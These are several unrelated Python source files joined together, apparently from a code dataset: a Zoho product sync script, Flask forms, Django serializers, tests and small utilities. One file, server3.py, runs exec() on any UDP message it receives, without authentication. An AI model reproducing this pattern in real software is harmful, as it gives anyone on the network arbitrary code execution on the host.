cursor.execute("""
INSERT INTO product_attributeproduct(attribute_id, product_type_id)
VALUES(%s, %s)
ON CONFLICT (attribute_id, product_type_id) DO UPDATE
SET id = product_attributeproduct.id
RETURNING ID
""", (attribute.id, pt.id))
pt.attributes[i].assignment_id = cursor.fetchone()[0]
comment(f' Assignment ID: {pt.attributes[i].assignment_id}')
# Attribute Values
for j, value in enumerate(attribute.values):
cursor.execute("""
INSERT INTO product_attributevalue(name, slug, value, attribute_id)
VALUES(%s, %s, %s, %s)
ON CONFLICT (attribute_id, slug) DO UPDATE
SET id = product_attributevalue.id, name = %s, value = %s
RETURNING id
""", (
# INSERT clause
value.value, value.slug, value.slug, pt.attributes[i].id,
# UPDATE clause
value.value, value.slug
))
pt.attributes[i].values[j].id = cursor.fetchone()[0]
comment(f' Value {value.value} : {pt.attributes[i].values[j].id}')
return pt
def handle_product_category(cat: Category = None) -> Category:
global cursor
warning('CATEGORIES')
cursor.execute("""
INSERT INTO product_category
(name, slug, level, description, lft, rght, tree_id,
background_image, background_image_alt, description_json, parent_id,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
SET id = product_category.id, name = %s
RETURNING id
""", (
# INSERT clause
cat.name, cat.slug, cat.level, cat.description,
cat.lft, cat.rght, cat.tree_id,
cat.background_image, cat.background_image_alt,
cat.description_json, cat.parent_id,
'{}', '{}',
# UPDATE clause
cat.name
))
cat.id = cursor.fetchone()[0]
comment(f'{cat.name}: {cat.id}')
for i, child_cat in enumerate(cat.children):
cat.children[i].parent_id = cat.id
child_cat.parent_id = cat.id
cursor.execute("""
INSERT INTO product_category
(name, slug, level, description, lft, rght, tree_id,
background_image, background_image_alt, description_json, parent_id,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
SET id = product_category.id, name = %s
RETURNING id
""", (
# INSERT clause
child_cat.name, child_cat.slug, child_cat.level, child_cat.description,
child_cat.lft, child_cat.rght, child_cat.tree_id,
child_cat.background_image, child_cat.background_image_alt,
child_cat.description_json, child_cat.parent_id,
'{}', '{}',
# UPDATE clause
child_cat.name
))
cat.children[i].id = cursor.fetchone()[0]
comment(f' {child_cat.name}: {cat.children[i].id}')
return cat
def handle_product_collection(collections: list = None) -> None:
global cursor
warning('COLLECTIONS')
for c, collection in enumerate(collections):
cursor.execute("""
INSERT INTO product_collection
(name, slug, background_image, seo_description, seo_title,
is_published, description,
publication_date, background_image_alt, description_json,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT(slug) DO UPDATE
SET id = product_collection.id, name = %s
RETURNING id
""", (
# INSERT clause
collection.name, collection.slug, '', '', '', 'True', '',
'NOW()', '', '{}', '{}', '{}',
# UPDATE clause
collection.name
))
collections[c].id = cursor.fetchone()[0]
comment(f'{collection.name}: {collection.id}')
return collections
def fix_category_hierarchy():
info('===== FIXING HIERARCHY =====')
global db
"""
Note: this only is going to work for 2-level category hierarchies, as the data
given for the import is set up that way.
:return:
"""
warning("Rebuilding category hierarchy")
# Rebuild the category nested set hierarchy (◔_◔)
cursor = db.cursor(cursor_factory=DictCursor)
fields = ['id', 'name', 'slug', 'lft', 'rght', 'tree_id', 'level', 'parent_id']
cursor.execute("""SELECT * FROM product_category""")
categories = []
for result in cursor.fetchall():
category = Category(result['name'])
for f in fields:
setattr(category, f, result[f])
categories.append(category)
for cat in categories:
if cat.parent_id:
parent = next((p for p in categories if p.id == cat.parent_id), None)
if parent is None:
error(
f'Cannot find parent category for "{cat.name}" (pid {cat.parent_id})')
return False
else:
parent.children.append(cat)
parent_categories = list(filter(lambda c: c.parent_id is None, categories))
tid = 1
for pc in parent_categories:
left = 1
pc.tree_id = tid
pc.lft = left
left += 1
for child in pc.children:
child.lft = left
child.rght = left + 1
child.tree_id = tid
child.level = 1
left += 2
pc.rght = left
tid += 1
# Write to db
for pc in parent_categories:
for c in [pc] + pc.children:
comment(f'Updating hierarchy for {c.name} ({c.id}).')
try:
cursor.execute("""
UPDATE product_category
SET lft = %s, rght = %s, tree_id = %s, level = %s
WHERE id = %s
""", (c.lft, c.rght, c.tree_id, c.level, c.id))
except Exception as e:
error(f'Cannot set hierarchy: "{c.name}" ({c.id}).')
error(e)
return False
return True
def disable_products(products_to_disable=None):
global cursor
if products_to_disable is None:
return True
skus = tuple(str(p['SKU']).strip("'") for p in products_to_disable if p['SKU'])
if len(skus) < 1:
return 0
warning(f'Disabling {len(skus)} Products')
cursor.execute("""
UPDATE product_product p
SET is_published = FALSE
FROM product_productvariant pv
WHERE pv.product_id = p.id AND pv.sku in %s
""", (skus,))
return len(products_to_disable)
def do_import(arguments=None):
info('===== RUNNING IMPORT =====')
global oauth_token
global cursor
environment = 'production'
if '--local' in arguments:
del arguments[0]
environment = 'local'
load_dotenv()
sync_all = False
force_images = False
if '--sync-all' in arguments:
sync_all = True
if '--force-images' in arguments:
force_images = True
db = db_connect(environment)
if not db:
error('Cannot connect to database.')
return False
cursor = db.cursor()
if not get_oauth():
error("Could not retrieve updated access token.")
return False
url = 'https://www.zohoapis.com/crm/v2/Products'
headers = {
'Authorization': f'Zoho-oauthtoken {oauth_token}'
}
# Limit the amount of calls we need to make by only grabbing changes
# within the last 48 hours
# (should also be enough to catch a failed sync or two)
# can override with --sync-all flag
if not sync_all:
last_modified = datetime.now() - timedelta(hours=48)
modified_since = f'{last_modified.strftime("%Y-%m-%d")}T00:00:00+05:00'
headers['If-Modified-Since'] = modified_since
parameters = {
'page': 1,
'per_page': 200,
}
keep_going = True
while keep_going:
info(f'Fetching page {parameters["page"]}')
response = requests.get(url=url, headers=headers, params=parameters)
if response is not None:
data = response.json()
response_info = data['info']
products = list(filter(lambda x: x['Web_Available'] is True, data['data']))
remove_products = list(
filter(lambda x: x['Web_Available'] is False, data['data']))
for product in products:
"""
example `product`:
{
'$approval': {
'approve': False,
'delegate': False,
'reject': False,
'resubmit': False
},
'$approval_state': 'approved',
'$approved': True,
'$currency_symbol': '$',
'$editable': True,
'$in_merge': False,
'$orchestration': False,
'$process_flow': False,
'$review': None,
'$review_process': {
'approve': False,
'reject': False,
'resubmit': False
},
'$state': 'save',
'$taxable': True,
'Attribute_Name_1': 'Style',
'Attribute_Name_2': 'Joint Size',
'Attribute_Name_3': 'Brand',
'Attribute_Name_4': None,
'Attribute_Name_5': None,
'Attribute_Name_6': None,
'Attribute_Value_1': 'Slide',
'Attribute_Value_2': '14mm',
'Attribute_Value_3': 'NA',
'Attribute_Value_4': None,
'Attribute_Value_5': None,
'Attribute_Value_6': None,
'Category': 'Slides',
'Collection': None,
'Cost': 3.5,
'Created_Time': '2021-04-30T13:49:13-04:00',
'Department': 'Smoke Shop',
'Description': None,
'Margin': 76.651,
'Needs_Reviewed': True,
'Owner': {
'email': '<EMAIL>',
'id': '3980137000000211013',
'name': '<NAME>'
},
'Product_Name': 'Got Vape - FGA366 Yellow/Black 14mm Slide | 400000236445',
'Product_Photos': None,
'Record_Image': None,
'SKU': "400000236445'",
'Supplier': 'Got Vape',
'Tag': [],
'Tax': [],
'Taxable': True,
'UPC': None,
'Unit_Price': 14.99,
'Web_Available': True,
'id': '3980137000009112120'
}
"""
handle_raw_product(product, {
'force_images': force_images
})
disable_products(remove_products)
parameters['page'] += 1
keep_going = response_info['more_records']
else:
keep_going = False
return True
def bust_cache():
info('===== CLEARING CACHE =====')
qk = cache.keys("query-*")
cache.delete_many(qk)
return True
if __name__ == '__main__':
result = (do_import(sys.argv[1:]) and
fix_category_hierarchy() and
bust_cache())
message = 'Zoho sync completed successfully.'
has_error = 0
if result:
warning('Done.')
else:
has_error = 1
error("Completed with errors. There is likely output above.")
message = 'Zoho sync had errors.'
# Try sending email
try:
send_email('Zoho Sync Status', message)
except:
error("Could not send email notification.")
# Exit script
sys.exit(has_error)
| 1.984375 | 2 |
dataviva/apps/user/forms.py | joelvisroman/dataviva-site | 126 | 12796766 | <reponame>joelvisroman/dataviva-site
from flask_wtf import Form
from wtforms import TextField, DateField, BooleanField, HiddenField, validators, PasswordField, SelectField
class SignupForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
fullname = TextField('fullname', validators=[validators.Required(),
validators.Length(min=3, max=128,
message='Name field must be between 3 and 128 characters long.')])
password = PasswordField('password', validators=[validators.Required(),
validators.EqualTo('confirm',
message='Passwords must match')])
confirm = PasswordField('confirm', validators=[validators.Required()])
agree_mailer = BooleanField('agree_mailer')
class SigninForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
password = PasswordField('password', validators=[validators.Required()])
class ChangePasswordForm(Form):
current_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
new_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
confirm = PasswordField('confirm', validators=[validators.Required(), validators.EqualTo(
'new_password', message='Passwords must match')])
class LoginForm(Form):
provider = HiddenField('provider', validators=[validators.Required()])
remember_me = BooleanField('remember_me', default=False)
class ForgotPasswordForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
class ProfileForm(Form):
fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')])
email = TextField('email', validators=[validators.Required(), validators.Email()])
birthday = DateField('birthday', validators=[ validators.Required()],format='%d/%m/%Y', description='Date format: day/month/year')
country = TextField('country', validators=[validators.Required(), validators.Length(max=50, message='Country field must be 50 characters long.')])
state_province_region = TextField('state_province_region', validators=[validators.Required(), validators.Length( max=50, message='Format error.')])
city = TextField('city', validators=[validators.Required(), validators.Length(max=50, message='City field must be 50 characters long.')])
profile = SelectField('gender', choices=[('development_agents', 'Development Agents'),('entrepreneurs', 'Entrepreneurs'), ('students', 'Students and Professionals')])
occupation = TextField('occupation', validators=[validators.Required(), validators.Length(max=50, message='Occupation field must be 50 characters long.')])
institution = TextField('institution', validators=[validators.Optional(), validators.Length(max=50, message='Institution field must be 50 characters long.')])
agree_mailer = BooleanField('agree_mailer')
| 2.96875 | 3 |
docker/molecule/tests/test_docker.py | thisisthetechie/raspberry-ansible | 43 | 12796767 | <filename>docker/molecule/tests/test_docker.py
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_is_docker_installed(host):
package_docker = host.package('docker-ce')
assert package_docker.is_installed
def test_run_hello_world_container_successfully(host):
hello_world_ran = host.run("docker run hello-world")
assert 'Hello from Docker!' in hello_world_ran.stdout
| 2.21875 | 2 |
bubble_sorter/__init__.py | joshuabode/bubble-sort-python | 0 | 12796768 | from .bubble_sort import *
| 1.078125 | 1 |
redditpoller/migrations/0014_auto_20170304_1513.py | ericleepa/watcherforreddit | 8 | 12796769 | <filename>redditpoller/migrations/0014_auto_20170304_1513.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-04 20:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('redditpoller', '0013_watchedsubreddit_watchedsubredditthreads'),
]
operations = [
migrations.RenameField(
model_name='watchedsubredditthreads',
old_name='parent_subreddt',
new_name='parent_subreddit',
),
]
| 1.585938 | 2 |
common_holdings.py | Anindya-Das02/Portfolio-Common-Holdings | 0 | 12796770 | <reponame>Anindya-Das02/Portfolio-Common-Holdings
from loggers import COMPARE_FUNDS_DIR_PATH, finish, prgm_end, linespace
import os
os.chdir(COMPARE_FUNDS_DIR_PATH)
amcs = [f for f in os.listdir('.') if os.path.isfile(f)]
if len(amcs) == 0:
print("No AMCs file found for comparision.. please add files in 'Compare Funds' folder to compare!")
exit(0)
print(f"Comparing following {len(amcs)} funds:")
for fund_name in amcs:
print(f" - {fund_name}")
linespace()
holdings = []
for amc in amcs:
with open(amc,'r') as f:
holdings.append(set(f.readlines()))
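# Keep only the companies that appear in every fund's holdings list.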
common_companies = set.intersection(*holdings)
print(f"No of common companies: {len(common_companies)}")
counter = 1
for i in common_companies:
print(f"[{counter}]. {i}")
counter += 1
finish()
prgm_end()
| 2.671875 | 3 |
dj_vercereg/vercereg/serializers.py | davidath/dj-vercereg | 0 | 12796771 | # Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from models import WorkspaceItem
from models import Workspace
from models import PESig
from models import FunctionSig
from models import LiteralSig
from models import PEImplementation
from models import FnImplementation
from models import RegistryUserGroup
from models import Connection
from models import FunctionParameter
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from rest_framework import serializers
from vercereg.utils import get_base_rest_uri
##############################################################################
class UserSerializer(serializers.HyperlinkedModelSerializer):
def get_reg_groups(self, obj):
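# Resolve each auth Group the user belongs to into the REST URL of its
# RegistryUserGroup wrapper, skipping groups without a registry counterpart.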
toret = []
request = self.context.get('request')
for v in obj.groups.values():
group_id = v['id']
g = Group.objects.get(id=group_id)
try:
rug_instance = RegistryUserGroup.objects.get(group=g)
rug = (get_base_rest_uri(request) + 'registryusergroups/' +
str(rug_instance.id) + '/')
toret.append(rug)
except RegistryUserGroup.DoesNotExist:
pass
return toret
groups = serializers.SerializerMethodField('get_reg_groups')
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class Meta:
model = User
fields = (
'url',
'username',
'email',
'first_name',
'last_name',
'password',
'groups',
'ownsgroups')
write_only_fields = ('password',)
read_only_fields = ('ownsgroups',)
# class UserUpdateSerializer(serializers.HyperlinkedModelSerializer):
# groups = serializers.SerializerMethodField('get_reg_groups')
#
# def get_reg_groups(self, obj):
# toret = []
# request = self.context.get('request')
# for v in obj.groups.values():
# group_id = v['id']
# g = Group.objects.get(id=group_id)
# try:
# rug_instance = RegistryUserGroup.objects.get(group=g)
# rug = get_base_rest_uri(request) + 'registryusergroups/' +
# str(rug_instance.id) + '/'
# toret.append(rug)
# except RegistryUserGroup.DoesNotExist:
# pass
# return toret
#
# def restore_object(self, attrs, instance=None):
# user = super(UserUpdateSerializer, self).restore_object(attrs, instance)
# user.set_password(attrs['password'])
# return user
#
# class Meta:
# model = User
# fields = ('username', 'email', 'first_name', 'last_name', 'password',
# 'groups', 'ownsgroups',)
# write_only_fields = ('password',)
# read_only_fields = ('username',)
##############################################################################
class RegistryUserGroupSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# FIXME: The following is excluded as it break django rest for some reason.
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', 'owner', )
class RegistryUserGroupPutSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# ownerusername = serializers.CharField(source='get_owner_username',
# read_only=True)
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', )
##############################################################################
# class AdminRegistryUserGroupSerializer
# (serializers.HyperlinkedModelSerializer):
# group_name = serializers.CharField(source='get_group_name')#,
# read_only=True)
# owner_username = serializers.CharField(source='get_owner_username',
# read_only=True)
#
# class Meta:
# model = RegistryUserGroup
# fields = ('url', 'group_name', 'owner_username',
# 'group', 'owner', 'description')
# read_only_fields = ('group', )
##############################################################################
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('name',)
##############################################################################
class PEImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PEImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class FnImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FnImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class WorkspaceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Workspace
depth = 0
fields = ('id', 'url', 'name', 'owner', 'description',
'clone_of', 'creation_date')
read_only_fields = ('owner', 'creation_date',)
##############################################################################
class WorkspaceDeepSerializer(serializers.HyperlinkedModelSerializer):
pes = serializers.CharField(source='get_pesigs')
functions = serializers.CharField(source='get_fnsigs')
literals = serializers.CharField(source='get_literalsigs')
peimplementations = serializers.CharField(source='get_peimplementations')
fnimplementations = serializers.CharField(source='get_fnimplementations')
class Meta:
model = Workspace
# TODO (nice-to-have) revisit the depth issue, user serialization is
# not good enough - disabled for now.
depth = 0
read_only_fields = ('owner', 'creation_date')
def transform_pes(self, obj, value):
request = self.context.get('request')
pes = obj.pesig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'pes/' +
str(p.id), pes)
def transform_functions(self, obj, value):
request = self.context.get('request')
fns = obj.functionsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'functions/' +
str(p.id), fns)
def transform_literals(self, obj, value):
request = self.context.get('request')
lits = obj.literalsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'literals/' +
str(p.id), lits)
def transform_peimplementations(self, obj, value):
request = self.context.get('request')
peimpls = obj.peimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'peimpls/' +
str(p.id), peimpls)
def transform_fnimplementations(self, obj, value):
request = self.context.get('request')
fnimpls = obj.fnimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'fnimpls/' +
str(p.id), fnimpls)
##############################################################################
class PESigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PESig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'connections',
'creation_date',
'peimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class ConnectionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Connection
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
class FunctionParameterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FunctionParameter
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
##############################################################################
class FunctionSigSerializer(serializers.HyperlinkedModelSerializer):
# implementations = serializers.WritableField
# (source='fnimplementation_set', required=False)
class Meta:
model = FunctionSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'creation_date',
'return_type',
'parameters',
'fnimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class LiteralSigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = LiteralSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'value',
'description',
'creation_date',
'clone_of')
read_only_fields = ('user', 'creation_date', )
| 1.765625 | 2 |
2018/aoc/d7/test.py | lukaselmer/adventofcode | 1 | 12796772 | <gh_stars>1-10
import unittest
from unittest.mock import mock_open, patch
from aoc.d7.main import step_order, time_required
DATA = "Step C must be finished before step A can begin.\nStep C must be finished before step F can begin.\nStep A must be finished before step B can begin.\nStep A must be finished before step D can begin.\nStep B must be finished before step E can begin.\nStep D must be finished before step E can begin.\nStep F must be finished before step E can begin.\n"
class TestCase(unittest.TestCase):
def test_step_order(self):
with patch("builtins.open", mock_open(read_data=DATA)):
self.assertEqual("CABDFE", step_order())
def test_time_required(self):
with patch("builtins.open", mock_open(read_data=DATA)):
self.assertEqual(15, time_required(0, 2))
if __name__ == "__main__":
unittest.main()
| 2.875 | 3 |
secure_data_store/__init__.py | HumanBrainProject/secure-data-store | 1 | 12796773 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Top-level package for Secure Data Store."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
| 1.085938 | 1 |
server/server3.py | lthurlow/scaling-computing-machine | 0 | 12796774 | import pdb # for debuggin
import sys
import time
import pprint
import fcntl # for get_ip_address
import struct # for get_ip_address
import threading # for threading UDPServer
import socket # for UDPServer
#sys.path.append("./third_party/libs/") # for scapy
import io # for dummy_exec (Python 3: io.StringIO replaces the old StringIO module)
#import logging # for logging, scapy modify logging level
#logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
#from scapy.all import *
import anhost # linux networking files
def set_env():
return
def dummy_exec(code):
# create file-like string to capture output
codeOut = io.StringIO()
codeErr = io.StringIO()
# capture output and errors
sys.stdout = codeOut
sys.stderr = codeErr
try:
exec(code)
except:
sys.stdout = "error"
sys.stderr = "error"
# restore stdout and stderr
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
#For now throw away the errors
return str(codeOut.getvalue())
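# NOTE: handle_pkt below relies on dpkt (never imported) and scapy (import
# commented out above); it is not called by the UDP server loop at the bottom.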
def handle_pkt(eth):
eth_src = ':'.join(hex(x) for x in map(ord, eth.src))
eth_dst = ':'.join(hex(x) for x in map(ord, eth.dst))
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
#print "Ethernet pkt"
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP:
ip_src = '.'.join(str(x) for x in map(ord, ip.src))
ip_dst = '.'.join(str(x) for x in map(ord, ip.dst))
udp = ip.data
udp_src = udp.sport
udp_dst = udp.dport
udp_data = dummy_exec(str(udp.data))
print(ip_src, ip_dst)
send(IP(dst=ip_dst,src=ip_src)/UDP(sport=udp_src,dport=udp_dst)/udp_data,\
iface="eth1", verbose=True)
else:
return
print(anhost.get_int_ip())
HOST, PORT = str(anhost.get_int_ip()), 50000
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST,PORT))
while True:
msg, addr = sock.recvfrom(1024)
print("msg:", msg)
server_thread = threading.Thread(target=dummy_exec,args=(msg,))
server_thread.start()
print(server_thread.join())
| 2 | 2 |
core/mail.py | jasonvriends/lifetracker-backend | 0 | 12796775 | <reponame>jasonvriends/lifetracker-backend
import os
from fastapi import BackgroundTasks
from fastapi_mail import ConnectionConfig, FastMail, MessageSchema
from core.settings import settings
from schemas.auth import EmailSchema
conf = ConnectionConfig(
MAIL_USERNAME=settings.MAIL_USERNAME,
MAIL_PASSWORD=settings.MAIL_PASSWORD,
MAIL_FROM=settings.MAIL_FROM,
MAIL_PORT=settings.MAIL_PORT,
MAIL_SERVER=settings.MAIL_SERVER,
MAIL_FROM_NAME=settings.PROJECT_TITLE,
TEMPLATE_FOLDER=f"{os.path.dirname(os.path.dirname(os.path.realpath(__file__)))}/templates/email",
MAIL_TLS=True,
MAIL_SSL=False,
USE_CREDENTIALS=True
)
def send_mail(background_tasks: BackgroundTasks, subject: str, emails: EmailSchema, template_name: str):
message = MessageSchema(
subject=subject,
recipients=emails.emails,
template_body=emails.body,
subtype='html',
)
fm = FastMail(conf)
background_tasks.add_task(fm.send_message, message,
template_name=template_name)
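# Minimal usage sketch, assuming a FastAPI router and a "welcome.html" template
# exist in the template folder; a route hands its BackgroundTasks instance to
# send_mail so the message goes out after the response is returned.
#
#   from fastapi import APIRouter, BackgroundTasks
#   router = APIRouter()
#
#   @router.post("/welcome")
#   async def welcome(emails: EmailSchema, background_tasks: BackgroundTasks):
#       send_mail(background_tasks, "Welcome!", emails, "welcome.html")
#       return {"status": "queued"}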
| 1.898438 | 2 |
stack/valid_parenthesis.py | javyxu/algorithms-python | 8 | 12796776 | """
Given a string containing just the characters
'(', ')', '{', '}', '[' and ']',
determine if the input string is valid.
The brackets must close in the correct order,
"()" and "()[]{}" are all valid but "(]" and "([)]" are not.
"""
def is_valid(s:"str")->"bool":
stack = []
dic = { ")":"(",
"}":"{",
"]":"["}
for char in s:
if char in dic.values():
stack.append(char)
elif char in dic.keys():
if stack == []:
return False
s = stack.pop()
if dic[char] != s:
return False
return stack == []
if __name__ == "__main__":
paren = "[]"
print(paren, is_valid(paren))
paren = "[]()[]"
print(paren, is_valid(paren))
paren = "[[[]]"
print(paren, is_valid(paren))
paren = "{([])}"
print(paren, is_valid(paren))
paren = "(}"
print(paren, is_valid(paren))
| 4.0625 | 4 |
decloud/acquisitions/sensing_layout.py | CNES/decloud | 8 | 12796777 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Classes for acquisition layouts"""
from dataclasses import dataclass
# --------------------------------------------- Acquisition classes ----------------------------------------------------
@dataclass
class GenericAcquisition:
""" Sentinel Acquisition """
timestamp: int
@dataclass
class S1Acquisition:
""" Sentinel-1 Acquisition """
ascending: bool = False
@dataclass
class S2Acquisition:
""" Sentinel-2 Acquisition """
min_cloud_percent: 'typing.Any'
max_cloud_percent: float
# ------------------------------------------- Acquisition layout class -------------------------------------------------
class AcquisitionsLayout(dict):
"""
Class storing the acquisition layout
"""
SENSOR_S1_KEY = "S1"
SENSOR_S2_KEY = "S2"
MAX_S1S2_TIMESTAMP_DELTA_KEY = "MAX_S1S2_TIMESTAMP_DELTA_KEY"
TIMESTAMP_BEGIN_KEY = "TIMESTAMP_BEGIN_KEY"
TIMESTAMP_END_KEY = "TIMESTAMP_END_KEY"
OPTIONS = {}
def new_acquisition(self, name, s1_acquisition=None, s2_acquisition=None, max_s1s2_gap_hours=None,
timeframe_origin=False, timeframe_start_hours=0, timeframe_end_hours=0):
"""
Add a new acquisition in the layout.
Parameters:
name: acquisition name (e.g. "Img_t-1")
s1_acquisition: a S1Acquisition instance or None
s2_acquisition: a S2Acquisition instance or None
max_s1s2_gap_hours: if both s1_acquisition and s2_acquisition are not None, this must be provided (maximum
number of hours between the s1_acquisition date and the s2_acquisition date)
timeframe_origin: True or False. If True, the acquisition will be considered as the temporal origin for the
other acquisitions. Meaning that the timeframe_start_hours and timeframe_end_hours or the other
acquisitions will be relative to the date of the s2_acquisition created with timeframe_origin=True. Only
one acquisition can be set as origin.
timeframe_start_hours, timeframe_end_hours: range of the timeframe. Relative to the acquisition which is the
reference (i.e. the only acquisition that has timeframe_origin=True)
"""
# Add a new key in the dict
assert name not in self
self[name] = dict()
if s1_acquisition is not None:
assert isinstance(s1_acquisition, S1Acquisition)
self[name][self.SENSOR_S1_KEY] = s1_acquisition
if s2_acquisition is not None:
assert isinstance(s2_acquisition, S2Acquisition)
self[name][self.SENSOR_S2_KEY] = s2_acquisition
# At least s1_acquisition or s2_acquisition must be different than None
assert s1_acquisition is not None or s2_acquisition is not None
# If both s1_acquisition and s2_acquisition are different than None, we must have the max_s1s2_gap_hours
# its default value is None
self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY] = None
if s1_acquisition is not None and s2_acquisition is not None:
assert max_s1s2_gap_hours is not None
assert max_s1s2_gap_hours > 0
self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY] = max_s1s2_gap_hours * 3600
# No need to set a [start, end] range if the acquisition is set as the reference (it will be the origin)
if timeframe_origin is True:
# Can be only one acquisition set as reference
for acquisition_name in self:
if acquisition_name != name:
assert not self.is_ref(acquisition_name)
assert timeframe_start_hours == 0
assert timeframe_end_hours == 0
self[name][self.TIMESTAMP_BEGIN_KEY] = min(timeframe_start_hours, timeframe_end_hours) * 3600
self[name][self.TIMESTAMP_END_KEY] = max(timeframe_start_hours, timeframe_end_hours) * 3600
def options(self, options):
self.OPTIONS = options
def is_siblings(self, acq_list, acq_name):
"""
        Return True if acq_name is declared as a sibling of any acquisition in acq_list.
"""
if "siblings" in self.OPTIONS.keys():
for sibling in self.OPTIONS["siblings"]:
for acq in acq_list:
if acq in sibling and acq_name in sibling:
return True
return False
def is_ref(self, name):
"""
Return True if the acquisition is set as the temporal origin.
"""
return self[name][self.TIMESTAMP_BEGIN_KEY] == 0 and self[name][self.TIMESTAMP_END_KEY] == 0
def get_ref_name(self):
"""
Return the acquisition name which is the temporal origin.
"""
for acquisition_name in self:
if self.is_ref(acquisition_name):
return acquisition_name
raise Exception("No temporal origin found! You must set one reference using "
"new_acquisition(..., timeframe_origin=True, ...)")
def get_timestamp_range(self, name):
"""
Return the timestamp range (timestamp_begin, timestamp_end)
"""
return self[name][self.TIMESTAMP_BEGIN_KEY], self[name][self.TIMESTAMP_END_KEY]
def get_s1s2_max_timestamp_delta(self, name):
"""
Return the get_s1s2_max_timestamp_delta of the specified acquisition.
None can be returned (if only a single s1_acquisition or a single s2_acquisition)
"""
return self[name][self.MAX_S1S2_TIMESTAMP_DELTA_KEY]
def _get_sx_acquisition(self, name, sensor_key):
if sensor_key not in self[name]:
return None
return self[name][sensor_key]
def has_s1_acquisition(self, name):
"""
